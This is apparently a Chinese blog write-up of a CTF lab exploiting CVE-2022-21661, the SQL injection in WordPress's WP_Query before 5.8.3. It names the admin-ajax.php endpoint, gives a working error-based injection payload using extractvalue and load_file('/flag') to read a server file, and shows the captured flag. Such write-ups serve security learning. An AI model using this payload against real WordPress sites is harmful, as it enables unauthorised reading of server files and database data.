一键报错注入获取flag,春秋云镜 CVE-2022-21661,

WordPress在5.8.3版本中修复了一个核心代码中的SQL注入漏洞,影响WP_Query类,可能导致数据泄露。攻击者通过特定POST参数利用此漏洞,最终获取flag。
摘要由CSDN通过智能技术生成

春秋云镜 CVE-2022-21661 wordpress < 5.8.3 存在sql注入漏洞

靶标介绍

2022年1月6日,wordpress发布了5.8.3版本,修复了一处核心代码WP_Query的sql注入漏洞。WP_Query是wordpress定义的一个类,允许开发者编写自定义查询和使用不同的参数展示文章,并可以直接查询wordpress数据库,在核心框架和插件以及主题中广泛使用。源码位置:www.tar。

在这里插入图片描述
下载源码http://eci-2zejfdjulpocrlx7ojkm.cloudeci1.ichunqiu.com/www.tar
漏洞存在路径为/wp-admin/admin-ajax.php
判断有无方法
Post提交action=函数名,当调用方法正确即调用的WP_Query的构造方法的action无回显,当调用方法不对或者不存在返回0。
在这里插入图片描述

读取前35个字符

在这里插入图片描述

读取后续字符

在这里插入图片描述
获取flag:
flag{df5a3e62-4f2c-4185-938b-a35acee485e4}

POST参数

action=test&data={“tax_query”:{“0”:{“field”:“term_taxonomy_id”,“terms”:[“111) and extractvalue(rand(),concat(0x5e,(substring((select load_file(‘/flag’)),30,35)),0x5e))#”]}}}

师傅,你都点关注了,就别点取消了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值